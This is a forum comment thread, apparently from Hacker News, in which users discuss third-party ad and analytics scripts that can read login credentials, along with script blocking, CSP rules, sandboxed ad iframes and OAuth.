I still get messages along the lines of, "Your hard drive is full. Dropbox cannot synchronize until you free up some disk space," with 4 GB free, even though many users have complained loudly about that for years. The Dropbox client was also causing weird problems with dropdown menus in MS Office applications for a long time, which took forever to track down. That at least appears to have been fixed now, although I can't (or perhaps don't want to) imagine how it happened in the first place.

Dropbox does hard things, HN conventional wisdom notwithstanding, and they do them reasonably well. But they can be very slow to recognize when they're doing something wrong.

A founder of a “customer experience” service cold-messaged me once. I came in to see more about what they were doing, and they interviewed me a bit.

As far as I could gather they provided a script to their customers that added event listeners to everything on the DOM and sent it to their servers. As far as I can tell, they were going fast and loose. They weren’t interested in me, but I must say I wasn’t interested in them either.

I was already blocking ads via uBlock Origin, but now I may start blocking third-party scripts by default.

I switched into a block-all-scripts-by-default web stance a while back and am continuously amused by how operable different sites are: some degrade relatively gracefully, some just go white screen (usually an SPA of some sort), and other sites go totally wonky when they find themselves unable to rewrite the DOM and style rules to render the page as they want. It's sorta close to that old occurrence when CSS would fail to download and you'd have a giant <ul> block that was being restyled as a menu... but far more disappointing, because there is really no reason to push styling into JS with so many out-of-the-box responsive style frameworks at this point.

I use uMatrix on Linux and am continuously surprised how many blog-like websites could be plain HTML/CSS, since they just have text and images, but don't show any content at all with Javascript disabled. More and more often I'll just go back where I came from and don't bother with these sites anymore.

For non-technical blogs it's unfortunate because the authors don't know any better. For technical blogs it's a feature that lets you know someone is not worth listening to.

And the SVG icons... lol. Devs can't be bothered to set a reasonable default size in the image itself, so you're greeted with a huuuge Twitter icon across the entire screen, and the page is just 20000px of huge "social" icons with 500px of text somewhere in there if you scroll carefully.

Almost nobody actually cares about graceful degradation these days.

> some just going white screen

I find this happens with a lot of news sites. It's hilarious that a website made primarily for displaying text is absolutely defeated by turning off javascript.

CNN text only: https://lite.cnn.io/en

NPR text only: https://text.npr.org

And although not news, Facebook has a secret no-Javascript version here: https://mbasic.facebook.com

The really fun ones are the ones that work better with the JS disabled.

Best yet for me was 'client-side pricing' - I increased basket 'weight', and the web app neglected to correspondingly increase the price.

A blog website whose logo is a big M?

At least 1st party javascript usually fixes the white screen, but sometimes blocking styles does. What I also found interesting is that disabling javascript with CSP can sometimes also fix websites that are hostile in their <noscript> tag, since javascript blocked by CSP doesn't trigger <noscript>.

A surprising number of sites use third party cached versions of scripts - and a number still also use static domains... for instance stackoverflow.com uses sstatic.net I assume because all the stack sites refer to the same pool of scripts... this actually used to be a best practice for performant webpages since many browsers would limit the number of parallel resource downloads on a per-domain basis, so yahoo.com could render quicker if it has img3-yahoo.com and img2-yahoo.com and js-yahoo.com - though subdomains may have sufficed for that at that point, I can't quite recall.

I have a keyboard shortcut for a "dangerous" mode that allows 3rd party images, 3rd party styles, but still only 1st party javascript. Works for stackoverflow.com, not that it doesn't show content without any of 3rd party stuff and any scripts. But I get what you are talking about, different, but still technically 1st party domains and separate CDN domains for some websites is the reason I have rules in my extension, it's like whitelisting adblocking.

A possible solution for this would be for the extension blocking third party scripts to have a list of domains that are known to be associated, like stackoverflow.com and sstatic.net, and then consider the latter to be first party for the former, pre-populated for all the major sites.

If the list is domain based then you run into a "who is paying to maintain the list" problem, and if it's self-registered (i.e. stackoverflow tells you sstatic.net is legit) then who verifies it was actually stackoverflow that told you that? And if you manage to verify that it came from someone within the domain or the registered owner... then how can you verify that sstatic isn't a domain serving malicious scripts and the owner isn't selling out users to the site to make a quick extra buck from some third party ad provider, or that it isn't the former owner who is acting maliciously, or that it isn't the current owner who is trying to undo the former owner who acted maliciously?

I think you could quite sanely track a few sites, maybe the top 200 or 300... after that it'd get unwieldy.

And, for fun, on the other side I believe a few years ago Google's in-house public hosting of jQuery received a bad push and was serving a tainted package for a while... even the good actors can mess this up.

A peer vetting system might work well (like DNS) but it'd need a lot of careful thought.

Maintaining the list for the most popular sites is not a huge ordeal. You have a bug tracker where people can submit issues, when you get one you take a few minutes to check that the whois matches the main site and the page actually links the script in a way consistent with what we want to approve, and the opposite if you get a report of something having changed the other way. An individual could do it by spending a few hours a month.

For less popular sites, the user can add it manually, or the site operator notices their site is broken for increasingly many users and stops linking scripts from other domains.

> And, for fun, on the other side I believe a few years ago google's in house public hosting of jQuery received a bad push and was serving a tainted package for a while... even the good actors can mess this up.

That's an independent problem. You could have the same thing happen for actual first party scripts.

And in this context if they're really good actors then they fix it as soon as it's discovered, and if they're not then you take them off the approved list.

It can be done and can be pretty nice. I got to around 30 websites myself with just custom CSP policies for each and plenty of ideas what to do next, like making CSP policies composable, so I can define a rule for say recaptcha and include it for websites that use it, and things like that. Javascript walls (cloudflare, sucuri, etc.) are another problem: you wouldn't want to enable javascript just to pass them, and you wouldn't want to pass them automatically as it would allow websites to enable javascript. They also may include recaptcha, etc. Still, nothing that can't be solved.

uMatrix is pretty effective. The web is noticeably less terrible with it, although you may have to re-enable scripts on some sites from time to time for them to work completely.

The constant necessity to re-enable turned me off from uMatrix, and I'd guess many others. Perhaps the defaults should be much softer.

I would like to point out that, despite this arguably catastrophic situation, it's not much of an issue in practice.

Stealing credentials through third party code is a relatively expensive attack. It has to be engineered for a specific site and then it needs to pass the auditing of the vector (i.e. the ad network, or the developers).

Once the attacker has achieved that, what do they get? The credentials for most sites are worthless. Of course some users might use the same password on multiple sites, but they had it coming.

Those sites that do have valuable credentials also have heightened security measures. If your bank is serving you ads on the login screen, perhaps you should use another bank.

Running uBlock or similar is now a part of a basic web browsing hygiene.

There used to be starting projects which used cryptocurrency or some other token system to allow you to "load" your browser with credits, which then would get auto (or semi-auto) voluntarily distributed to the websites you read, which support this mechanism. But I think they haven't caught on. But essentially, I hope they come back.

In the mean time, I'm still waiting for a reasonable solution to block advertising and tracking scripts on the mobile - as e.g. I think no sane (and informed) person will use a closed source browser, e.g. Brave.

Assuming you are using Firefox on Android, you can use uBlock Origin or almost any other extension as you would on desktop.

uBO works on desktop Brave too (a lot of redundancy but it adds 1st party blocking features) and we will keep it working, whereas Google seems intent on breaking it with Manifest V3 extension API changes.

Brave is all open source. Why did you think otherwise?

I was trying to find its source once and I couldn't. Thanks!

Regarding the answer:

> It's worse than that. Web performance tools and similar not only read your credentials but they read the credentials you type and then delete. Very nasty. You might be able to get away with not typing, always pasting your credentials. But the javascript has access to your DOM so it can just read every element. The only way to stop that is not to use credentials but to use OAuth and hand your life over to Google. What could go wrong.

What’s the technical explanation how OAuth is safe in this context? If the DOM is accessible wouldn’t other things be accessible?

The authentication happens on a different site (the Google login site) then, and you only get back a token. The worst the ad could do is steal your token then, which will only be valid for a little while.

OTOH if it’s so easy to steal it, they could just steal the next one, not needing any credentials at all. Or steal the refresh token?

How would an ad possibly steal the token then?

Rephrase: how would one make sure it’s protected.

If you make sure that login/registration pages have no ads, that's not enough to be secure.

One example: you've probably clicked the "login" (or register) link from a page that does have ads, and a malicious script could've hijacked that click and presented you with a perfect replica of a login (or register) page, and then captured your input. And I'm sure there are many other such tricks.

It occurred to me that I, and others, are trying to deal with advertising the wrong way. It's a waste of time to try to filter out ads per page. There needs to be a way to search pages without ads (without javascript ads anyway) and to show pages without links to pages with ads.

Sadly Google/Facebook/Amazon only care about increasing speed and loading pages fast. Many new standards are being developed for this, but not for user security, as ads are their primary business.

Pick a random webpage with ads, right click, and "inspect element".

You will see the ad is rendered in a sandboxed iframe.

It's true that the ad-network can usually run in the context of the main page, but the ad itself cannot.

The ad network is typically fairly trusted - they are profitable businesses with a lot to lose to lawsuits if they store or leak your password.

It's the ad itself that you shouldn't trust - anyone with $1 can submit an ad. And that's why it's sandboxed.

We all know this is not generally true. Ad networks will even explicitly allow advertisers to inject their own unsandboxed js. And so will publishers. But hypothetically if this was true still doesn't make a difference, adtech is pretty negligent of security.

> a lot to lose to lawsuits if they store or leak your password.

This has been demonstrated to be wrong (see: every time there's malware on an ad network).

There has been no instance of malware on an ad network (that I know of).

The malware has been in an ad creative, and those are sandboxed. The malware has usually exploited weaknesses in the browser, but if there weren't browser exploits, it still wouldn't get access to the host page.

Such browser exploits are getting harder to find with things like per-domain process isolation in Chromium based browsers.

The only thing creative here is the imagination that the ad network is not responsible for the content it serves, though I recognise we may just have fundamentally different outlooks on responsibility. If that is the case, I feel like discussing it further is not going to help either one of us.

How about side channel attack (such as meltdown and spectre) from ads? Is it possible?

Normally yes, but most browsers have mitigations in place that prevent this from happening, for some degree of prevent. Browser mitigations, plus OS updates and Intel/AMD firmware updates, for machines that stay up to date, make the specific Meltdown/Spectre attacks mostly not a thing in JS (in the browser).

That said, JavaScript (in browser) and security are basically 100% opposites. If you can execute JS in a browser, you can do whatever you want to that page in the browser.

There is a problem with mitigations in web browsers, the only practical problem they are targeting is a hypothetical situation of a 3rd party script running in a sandboxed iframe, but almost none of them do! They don't need side channels to steal anything, they are not isolated. And the only acceptable use for a sandboxed 3rd party iframe is to block it by default.

Well, I was going to say more on the subject, but didn't want to get flamed by JS lovers. I did say "If you can execute JS in a browser, you can do whatever you want to that page in the browser."

I don't disagree with your point, but there is another perspective that the mitigations aim to stop, which is cross-tab/window data gathering (and cross process), which is most of the point of Spectre and friends anyways, which is stealing data from some other process, not the process you are running under. Stealing from your own process is easy. Stealing from another process is supposed to be hard, and stealing from the kernel is supposed to be impossible.

Many years ago, I was a software architect at an online travel company. Marketing kept asking me to approve third-party hosted tracking scripts walking the DOM looking for tracking tags at every step on our purchase path. I objected on the billing page, simply because I couldn't guarantee the safety of credit card numbers and customer data, but said it would be okay if we reviewed and hosted their js statically, but the third parties always refused.

Perhaps I overreacted, because at the time, the e-commerce industry didn't seem to care about the risk. Do they now?

I hope OWASP/PCI/GDPR have since developed opinions about third party hosted js on sensitive pages.

So the solution is to disable JS?

Basically, yes. I use NoScript, blocking everything by default. If a page doesn't load, I enable stuff until it does. I've been doing this for years, so I know what's generally needed.

But for Goodreads, I'd be hosed as soon as I allowed the site itself:

> In the case of goodreads, their HTML contains javascript from the ad provider. Specifically, lines 81-145 of the HTML document returned by https://www.goodreads.com/ read:

However, it's more or less readable without allowing any scripts. So hey.

So was that a way to work around ad blockers?

TL;DR: yes.

They suggest mitigating this by putting ads in a sandboxed iframe (unlikely and probably not foolproof) and not having ads on a login page, but ads can probably still steal your credentials.

It should be obvious that loading untrusted third-party content compromises security, but apparently that is unimportant to sites that use third-party advertising services.

Aren't most OSs now blocking read access to text fields labeled as "password"? I'm pretty sure macOS does this now.

Not in the browser.
